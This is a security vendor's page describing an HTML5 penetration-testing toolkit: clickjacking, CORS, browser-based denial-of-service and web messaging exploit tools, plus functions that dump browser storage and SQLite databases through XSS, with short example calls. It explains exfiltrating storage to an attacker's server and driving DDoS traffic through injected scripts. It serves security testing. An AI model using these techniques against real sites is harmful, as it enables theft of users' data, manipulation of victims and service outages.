AppSec Labs is a frontline company with regard to new technologies. Whether performing research of HTML5 technology, developing an HTML5 attack framework, or publishing tools for finding, testing and exploiting vulnerabilities that can be found in HTML5-based websites and in regular websites that have not been protected against HTML5 functionalities, AppSec Labs makes sure that it is on top of the game.
The HTML5 Toolkit contains the following tools
Clickjacking - Tester
AppSec Labs is proud to introduce the ClickJacking Tester – a tool which is designed to allow information security specialists around the world to easily check online whether their websites are vulnerable to ClickJacking/UI redressing attack:
http://online.attacker-site.com/html5/ClickjackingTester/
How to Use:
- Open the tool in your browser.
- Enter your website’s URL in the text box.
- Check “add allow-forms to Iframe” box in order to add the ‘allow-forms in the sandbox’ attribute in case it is necessary.
- Hit ‘enter’ or click submit button.
- If the page is vulnerable, it will be displayed in the window on the left side of the testing page.
- Take a screenshot for your PoC and enjoy!
Clickjacker – Exploit Clickjacking Easily
Clickjacker is a tool that helps to easily exploit clickjacking. Simply insert the vulnerable URL and locate the ‘social engineering’ on the element you would like the victim to click on by using the arrow buttons. Clickjacker will dynamically generate a link to send to the victim on the right-hand side.
In addition, you’ll have the raw HTML code to insert into an HTML file and upload to your own server, to send to the victim the link of the page using your domain.
Clickjacker’s URL address
http://attacker-site.com/html5/clickjacker/clickjacker_clickjacking_exploiter.htm
This tool is based on the HTML5_attack_framework.
Risks of clickjacking
Like in a CSRF attack, the user can be manipulated into performing actions on the website. It is easier to cause the user to click a specific button (such as ‘+1’, for example), but with advanced exploitation an attacker can manipulate a user to enter text into a text box or read text from a website.
Reading data by clickjacking via clickjacker
Clickjacker contains an advanced option that enables reading data by clickjacking. To do this, the social engineering type needs to be changed in the advanced tab from ‘click’ to ‘read’. Then, manually change the ‘iFrame container’ properties in the advanced tab to the specific size you need. Now simply change the opacity to 100.
CORS (Cross Origin Resource Sharing) Tester
Cross Origin Resource Sharing allows a domain to read data form another domain by use of java script (via AJAX requests). To test and create a proof of concept, you can use this tool: provide the relevant details (URL, POST data, HTTP method etc.) and the CORS tester will create a custom request for you and try to read the response.
If the response shows, it means that the page is vulnerable.
CORS tester’s URL address
http://online.attacker-site.com/html5/cors_tester/
This tool is based on the HTML5_attack_framework.
Risks of CORS vulnerability
- If sending cookies is allowed, the attacker can read the user’s data.
- Denial of Service, Drive By via innocent users’ browsers.
- Reading the website content via an allowed user’s browser (e.g. allowed country / local network).
HTML5 Denial of Service Checker
One of the easy DDoS attack options is to find persistent XSS in a central website and inject into it a script that will send many requests to the victim website. A Drive By is when the attacker use one website to attack another website, in this case, he injects a code into vulnerable websites, which causes them to attack the victim site when innocent users browse them. This tool tests how many requests your browser can send in one minute by using different methodologies.
There are HTML4 options and HTML5 options. HTML5 enables to also send POST requests (which in HTML4 can only be done very slowly). In addition, HTML5 enables sending other methods like put/delete/options, as well as sending the cookies (depending on the victim’s website permissions). To check if the website allows sending cookies and other HTML5 options, check our CORS tester tool.
HTML5 Denial of Service (DoS) tester’s URL address
http://online.attacker-site.com/html5/cors/dos_test.php
This tool based on the HTML5_attack_framework.
Common risks of DoS
- Overloading the server and causing it to slow down
- Crashing the server
Web Messaging Expoiter
The web messaging exploiter is a tool for monitoring and attacking web messaging that allows websites to send and receive data from iFrames. The messages are sent locally between the parent-page and the iFrame, and cannot be seen on any proxy tool or by browser’s debugger!
Web messaging exploiter’s URL address
http://attacker-site.com/html5/web_messaging/web_messaging_exploiter.htm
Malicious window
http://attacker-site.com/html5/web_messaging/web_messaging_malicious_window.htm
How to use it
- Open the Web Messaging Exploiter page.
- Choose the scenario (if you want to attack an iframe or a iframe’s container window).
- In a real scenario, when you want exploit a container, you must have a way to manipulate the iframe’s URL.
- From the exploiter page you can watch the messages between the victim’s window and the malicious window and also send your own messages.
Risks of Web Messaging vulnerability:
- XSS (Cross Site Scripting), if the website handled the input insecurely
- CSRF, if the website performs actions on users without validating the origin of the messages.
- Information leakage, if the website discloses user information without proper validation of the destination origin.
HTML5 Storage Dumper
Local/Session Storage
Some websites store information in session/local/global storages. To show how an attacker can exploit this and send all of the existing storages (Session storage, Local storage, Global storage) to the attacker’s server using XSS, use the function html5storage_dump_storages(). An example for Proof of Concept: This is a part of the HTML5_attack_framework.
SQLite sStorage
To collect the SQL data, you must use SQL Queries, the problem is that their results run as a kind of a-synchronic (not synchronic, and not a-synchronic). Therefore, the exploitation is a bit complex. The function updates a global variable named ‘dump’ and you can collect the information from it. An additional problem is that you need to know the database name- the HTML5 exploitation framework uses a number of methods to find it. The basic exploitation that collects the local/session storages and the SQLite storage is This is a part of the HTML5_attack_framework. This basic exploitation fetch with:
- sqlite_dump_database_by_obj – all page objects.
- sqlite_dump_database_by_dict – the following database names: ‘sql’, ‘SQL’, ‘DB’, ‘db’, ‘SQLITE’, ‘SQLite’, ‘sqlite’, ‘DB1’, ‘db1’, ‘DataBase’, ‘DATEBASE’, ‘sqli’.
- sqlite_dump_database_by_bruteforce – search for all 2 low alphabet characters without prefix/end fix.
To dump a specific known database, use something like:
sqlite_dump_database_if_exist('my_data_base'); setTimeout("alert(dump)", 500);
You can also use specific functions for specific exploits: Function sqlite_dump_database_if_exist(name) – receive the name of a database, and dump it (to the dump variable) if it exists. Function sqlite_dump_database_by_dict(dict) – receive a dict (for example [‘dbname’, ‘database1’] ) and fetch the data if it exists. Function sqlite_dump_database_by_obj() – check all the variables of the page, and if there is an object to a database, without knowing the database name, it will fetch the data. Function sqlite_dump_database(DBname, DBobj) – If you know the database, use this function. The DBobj parameter enables you to send an object that is already connected to the database, but it is optional. Function sqlite_dump_table(DBname, table, DBobj) – To dump a specific table. The DBobj is optional here too. Function sqlite_dump_database_by_bruteforce(chars, str, prefix, endfix, cur_char, cur_change) – Search databases by brute force. Be aware that it takes a few seconds… As an example of a run, you can see the following code:
var alphabeta = "abcdefghijklmnopqrstuvwxyz" var alphanumeric = "abcdefghijklmnopqrstuvwxyz0123456789" var capandlittle = "abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789" var maxlen = 2; var prefix = ""; var endfix = ""; sqlite_dump_database_by_bruteforce(alphabeta, " ".repeat(maxlen), prefix, endfix, 0, 0);
All of the above functions dump the data into the global variable ‘dump’. // ]]>
HTML5 Attack Framework
HTML5 adds functionality to the browser, this framework was created to help penetration testers find, test and exploit vulnerabilities.
The framework contains help functions like base64enc, base64dec, int, getElement etc., HTML5 functions like cors_send, web_messaging_send_to_iframe, and more, and exploits functions like clickjacking_update_HTML_elements, html5storage_dump_storages.
Framework’s URL address
https://appsec-labs.com/html5/html5_attack_framerwork.js
Tools that are based on this framework:
- Clickjacker – exploit clickjacking easily
- CORS (Cross Origin Resource Sharing) tester
- HTML5 Denial of Service (DoS) tester
- Web Messaging Exploiter (include Web Messaging Proxy)
HTML5 storage dumper